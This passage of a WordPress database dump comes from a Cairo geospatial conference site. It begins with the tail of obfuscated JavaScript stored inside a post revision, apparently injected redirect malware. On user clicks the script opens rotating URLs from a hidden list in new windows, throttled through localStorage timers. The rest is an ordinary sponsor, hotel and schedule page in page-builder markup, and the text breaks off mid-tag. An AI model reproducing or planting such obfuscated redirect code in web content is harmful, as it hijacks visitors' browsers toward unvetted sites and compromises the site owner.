_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-27 09:59:48','2023-07-27 09:59:48','',3066,'https://gsw2023.com/?p=5051',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5052,1,'2023-07-27 10:02:08','2023-07-27 10:02:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251674466{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: 